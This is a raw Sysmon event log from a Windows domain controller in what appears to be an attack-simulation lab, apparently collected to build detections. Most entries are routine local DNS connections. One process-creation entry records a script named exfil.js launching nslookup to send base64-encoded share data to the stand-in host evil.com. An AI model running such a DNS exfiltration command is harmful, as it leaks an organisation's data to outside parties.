process>-udpfalsefalse127.0.0.1-52596-false127.0.0.1-53domain 354300x8000000000000000199264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.831{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52596- 354300x8000000000000000199263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.831{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-52596-false127.0.0.1-53domain 354300x8000000000000000199262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.761{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52595- 354300x8000000000000000199261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.761{00000000-0000-0000-0000-000000000000}1692<unknown process>-udptruefalse127.0.0.1-52595-false127.0.0.1-53domain 354300x8000000000000000199260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.761{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52594- 354300x8000000000000000199259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.761{00000000-0000-0000-0000-000000000000}1692<unknown process>-udptruefalse127.0.0.1-52594-false127.0.0.1-53domain 354300x8000000000000000199258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.761{00000000-0000-0000-0000-000000000000}1692<unknown process>-udpfalsefalse127.0.0.1-52593-false127.0.0.1-53domain 354300x8000000000000000199257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.761{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52593- 354300x8000000000000000199256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.761{00000000-0000-0000-0000-000000000000}1692<unknown process>-udptruefalse127.0.0.1-52593-false127.0.0.1-53domain 354300x8000000000000000199255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.695{00000000-0000-0000-0000-000000000000}3504<unknown process>-udpfalsefalse127.0.0.1-52592-false127.0.0.1-53domain 354300x8000000000000000199254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.695{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52592- 354300x8000000000000000199253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.695{00000000-0000-0000-0000-000000000000}3504<unknown process>-udptruefalse127.0.0.1-52592-false127.0.0.1-53domain 10341000x8000000000000000199252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.407{2E1864BB-17BB-629A-FA3F-000000005F02}79445724C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-F93F-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.695{00000000-0000-0000-0000-000000000000}3504<unknown process>-udpfalsefalse127.0.0.1-52591-false127.0.0.1-53domain 354300x8000000000000000199250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.695{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52591- 354300x8000000000000000199249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.695{00000000-0000-0000-0000-000000000000}3504<unknown process>-udptruefalse127.0.0.1-52591-false127.0.0.1-53domain 354300x8000000000000000199248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.694{00000000-0000-0000-0000-000000000000}3504<unknown process>-udpfalsefalse127.0.0.1-52590-false127.0.0.1-53domain 354300x8000000000000000199247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52590- 354300x8000000000000000199246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.694{00000000-0000-0000-0000-000000000000}3504<unknown process>-udptruefalse127.0.0.1-52590-false127.0.0.1-53domain 354300x8000000000000000199245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.610{00000000-0000-0000-0000-000000000000}5696<unknown process>-udpfalsefalse127.0.0.1-52589-false127.0.0.1-53domain 354300x8000000000000000199244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.610{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52589- 354300x8000000000000000199243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.610{00000000-0000-0000-0000-000000000000}5696<unknown process>-udptruefalse127.0.0.1-52589-false127.0.0.1-53domain 354300x8000000000000000199242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.610{00000000-0000-0000-0000-000000000000}5696<unknown process>-udpfalsefalse127.0.0.1-52588-false127.0.0.1-53domain 354300x8000000000000000199241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.610{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52588- 354300x8000000000000000199240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.610{00000000-0000-0000-0000-000000000000}5696<unknown process>-udptruefalse127.0.0.1-52588-false127.0.0.1-53domain 354300x8000000000000000199239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.609{00000000-0000-0000-0000-000000000000}5696<unknown process>-udpfalsefalse127.0.0.1-52587-false127.0.0.1-53domain 354300x8000000000000000199238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.609{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52587- 354300x8000000000000000199237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.609{00000000-0000-0000-0000-000000000000}5696<unknown process>-udptruefalse127.0.0.1-52587-false127.0.0.1-53domain 354300x8000000000000000199236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.533{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52586- 354300x8000000000000000199235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.533{00000000-0000-0000-0000-000000000000}4996<unknown process>-udptruefalse127.0.0.1-52586-false127.0.0.1-53domain 354300x8000000000000000199234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.533{00000000-0000-0000-0000-000000000000}4996<unknown process>-udpfalsefalse127.0.0.1-52585-false127.0.0.1-53domain 354300x8000000000000000199233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.533{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52585- 354300x8000000000000000199232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.532{00000000-0000-0000-0000-000000000000}4996<unknown process>-udptruefalse127.0.0.1-52585-false127.0.0.1-53domain 354300x8000000000000000199231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.531{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52584- 354300x8000000000000000199230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.192{00000000-0000-0000-0000-000000000000}6020<unknown process>-udpfalsefalse127.0.0.1-52583-false127.0.0.1-53domain 354300x8000000000000000199229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.192{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52583- 354300x8000000000000000199228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.192{00000000-0000-0000-0000-000000000000}6020<unknown process>-udptruefalse127.0.0.1-52583-false127.0.0.1-53domain 10341000x8000000000000000199227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.404{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-FA3F-000000005F02}7944C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000199226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.192{00000000-0000-0000-0000-000000000000}6020<unknown process>-udpfalsefalse127.0.0.1-52582-false127.0.0.1-53domain 354300x8000000000000000199225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.192{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52582- 354300x8000000000000000199224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.192{00000000-0000-0000-0000-000000000000}6020<unknown process>-udptruefalse127.0.0.1-52582-false127.0.0.1-53domain 354300x8000000000000000199223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.191{00000000-0000-0000-0000-000000000000}6020<unknown process>-udpfalsefalse127.0.0.1-52581-false127.0.0.1-53domain 354300x8000000000000000199222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.191{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52581- 354300x8000000000000000199221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.191{00000000-0000-0000-0000-000000000000}6020<unknown process>-udptruefalse127.0.0.1-52581-false127.0.0.1-53domain 354300x8000000000000000199220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-52580-false127.0.0.1-53domain 354300x8000000000000000199219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52580- 354300x8000000000000000199218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-52580-false127.0.0.1-53domain 354300x8000000000000000199217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-52579-false127.0.0.1-53domain 354300x8000000000000000199216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52579- 354300x8000000000000000199215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-52579-false127.0.0.1-53domain 354300x8000000000000000199214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-52578-false127.0.0.1-53domain 354300x8000000000000000199213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52578- 354300x8000000000000000199212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.073{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-52578-false127.0.0.1-53domain 10341000x8000000000000000199211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.385{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.932{00000000-0000-0000-0000-000000000000}7144<unknown process>-udpfalsefalse127.0.0.1-52577-false127.0.0.1-53domain 10341000x8000000000000000199209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.385{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.932{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52577- 354300x8000000000000000199207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.932{00000000-0000-0000-0000-000000000000}7144<unknown process>-udptruefalse127.0.0.1-52577-false127.0.0.1-53domain 354300x8000000000000000199206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.931{00000000-0000-0000-0000-000000000000}7144<unknown process>-udpfalsefalse127.0.0.1-52576-false127.0.0.1-53domain 10341000x8000000000000000199205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.385{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.931{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52576- 354300x8000000000000000199203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.931{00000000-0000-0000-0000-000000000000}7144<unknown process>-udptruefalse127.0.0.1-52576-false127.0.0.1-53domain 354300x8000000000000000199202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.931{00000000-0000-0000-0000-000000000000}7144<unknown process>-udpfalsefalse127.0.0.1-52575-false127.0.0.1-53domain 354300x8000000000000000199201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.931{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52575- 354300x8000000000000000199200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.931{00000000-0000-0000-0000-000000000000}7144<unknown process>-udptruefalse127.0.0.1-52575-false127.0.0.1-53domain 10341000x8000000000000000199199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.385{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.844{00000000-0000-0000-0000-000000000000}2128<unknown process>-udpfalsefalse127.0.0.1-52574-false127.0.0.1-53domain 354300x8000000000000000199197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.843{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52574- 354300x8000000000000000199196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.843{00000000-0000-0000-0000-000000000000}2128<unknown process>-udptruefalse127.0.0.1-52574-false127.0.0.1-53domain 10341000x8000000000000000199195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.385{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-F93F-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000199194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.843{00000000-0000-0000-0000-000000000000}2128<unknown process>-udpfalsefalse127.0.0.1-52573-false127.0.0.1-53domain 354300x8000000000000000199193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.843{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52573- 354300x8000000000000000199192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.843{00000000-0000-0000-0000-000000000000}2128<unknown process>-udptruefalse127.0.0.1-52573-false127.0.0.1-53domain 10341000x8000000000000000199191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.385{2E1864BB-17A1-629A-783D-000000005F02}55526228C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-F93F-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.843{00000000-0000-0000-0000-000000000000}2128<unknown process>-udpfalsefalse127.0.0.1-52572-false127.0.0.1-53domain 154100x8000000000000000199189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.398{2E1864BB-17BB-629A-F93F-000000005F02}2848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluaye.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000199188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.843{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52572- 354300x8000000000000000199187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.843{00000000-0000-0000-0000-000000000000}2128<unknown process>-udptruefalse127.0.0.1-52572-false127.0.0.1-53domain 354300x8000000000000000199186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.772{00000000-0000-0000-0000-000000000000}4832<unknown process>-udpfalsefalse127.0.0.1-52571-false127.0.0.1-53domain 23542300x8000000000000000199185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.385{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpbac.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.369{2E1864BB-17BB-629A-F73F-000000005F02}80605480C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-F83F-000000005F02}6156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 